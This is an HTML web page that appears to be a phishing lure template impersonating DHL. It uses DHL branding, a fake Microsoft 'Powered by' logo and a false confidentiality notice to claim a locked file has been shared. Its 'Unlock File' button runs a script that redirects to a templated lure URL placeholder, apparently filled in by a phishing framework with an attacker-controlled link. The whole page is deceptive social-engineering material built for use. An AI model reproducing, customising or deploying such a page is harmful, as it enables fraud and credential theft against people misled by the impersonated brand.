<!doctype html>
<html lang="en">
<head>
    <title>Logistics | DHL International GmbH</title>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    
    <link rel="icon" href="https://www.dhl.com/etc/clientlibs/dhl/clientlib-all/assets/favicon.ico" type="image/x-icon"/>

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <style>

        body {
            background-color: #f2f2f2;
        }

        #box {
            position: absolute;
            top: 50%;
            left: 50%;
            text-align: center;
            background-color: #fff;
            padding: 40px 40px;
            transform: translate(-50%, -50%);
            border-radius: 16px;
            -webkit-box-shadow: 10px 10px 22px 0px rgba(0,0,0,0.75);
            -moz-box-shadow: 10px 10px 22px 0px rgba(0,0,0,0.75);
            box-shadow: 10px 10px 22px 0px rgba(0,0,0,0.75);
        }

        .message {
            text-align: center;
            font-size: 24px;
            font-family: Arial, Helvetica, sans-serif;
        }
        
        .message1 {
            text-align: center;
            margin-top:-35px;
            font-size: 12px;
            font-family: Arial, Helvetica, sans-serif;
        }

        .download {
            text-align: center;
        }
        
        .c-voc-marketing-stage--bg-image {
        width: 100%;
        height: 100%;
        object-fit: cover;
        }
        
        .card {
        margin-top:-270px;
        }
        
        .c-image {
        width: 25%;
        font-size: 9px;
        margin-top: 2px;
        }
        
        .d-image {
        width: 22%;
        font-size: 10px;
        }
        
        #footer {
        position: absolute;
        bottom: 0;
        width: 100%;
        height: 2.5rem;            /* Footer height */
        }

	a:link {
	font-weight: bold;
	background-color: transparent;
	text-decoration: none;
	}

	a:hover {
        font-weight: bold;
        background-color: transparent;
        text-decoration: none;
        }

    </style>
    
</head>
<body>
        <nav class="navbar navbar-light navbar-expand-md" style="color: rgb(255,255,255);background: #FFCC00; height: 70px;">
        
        <div>
                    <a href="https://www.dhl.com/vn-vi/home.html" class="c-nav--logo ">
                        <img src="https://www.dhl.com/content/dam/dhl/global/core/images/logos/dhl-logo.svg" alt="Quay lại Trang chủ">
                    </a>
                </div>
                
                
    </nav>
   
    <div class="container py-4 py-xl-4">
        <div class="row mb-5">
             <img class="c-voc-marketing-stage--bg-image" src="https://www.dhl.com/content/dam/dhl/global/core/images/marketing-stage-2730x1120/glo-home-maketing-stage-tracking.web.785.246.jpg" data-object-fit="cover">
        </div>
       
    </div>
    
    <div id="box">
        <div class="message">
            <p><img src="https://www.dhl.com/content/dam/dhl/global/core/images/logos/dhl-logo.svg" alt="Quay lại Trang chủ"> <font size="2">shared a file with you<br></font></p>
        </div>
        <div class="download">
            🔐 <button type="button" class="btn btn-primary" style="background: orange;" onclick="redirect()"> Unlock File</button>
        </div>
        <span style="overflow-x: visible;" class="d-image"> Powered by</span>
        <img alt="" itemprop="logo" class="c-image" src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" role="presentation" aria-hidden="true" style="overflow-x: visible;">
        
    </div><br><br><br>
    <div class="message1">
            <p><font color="black">DHL shall take reasonable steps to keep your personal data as accurate, complete, and up-to-date as is necessary for the purposes for which it is to be used.<p> This file is locked 🔐 and requires authrization to view. In the case of locked file(s) transmitted by
 <a href="https://www.dhl.com"> DHL </a> via e-mail, the confidentiality of the transmitted information is guaranteed.</b></font></font></p></p>
            <br><br><br> 
            
            <div><footer id="footer"><font color="gray">2022 © - All rights reserved. DHL International GmbH.</font></footer>
 
            </div>
    </div>    

    <script>
        function redirect() {
            window.location.assign({lure_url_js});
        }
    </script>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js" integrity="sha384-9/reFTGAW83EW2RDu2S0VKaIzap3H66lZH81PoYlFhbGU+6BZp6G7niu735Sk7lN" crossorigin="anonymous"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script> 
</body>
</html>

